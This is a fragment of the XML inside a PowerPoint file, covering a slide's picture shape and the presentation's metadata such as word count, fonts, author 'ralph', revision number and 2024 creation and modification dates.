              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99234ECD-FF06-4ABC-A46D-5F9ADD132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971" y="1738312"/>
            <a:ext cx="6572250" cy="3381375"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39770700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366</TotalTime>
  <Words>1549</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>91</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Century Gothic</vt:lpstr>
      <vt:lpstr>Times New Roman</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ralph</cp:lastModifiedBy>
  <cp:revision>84</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-05-12T20:22:44Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-06-29T14:28:35Z</dcterms:modified>
</cp:coreProperties>
</file>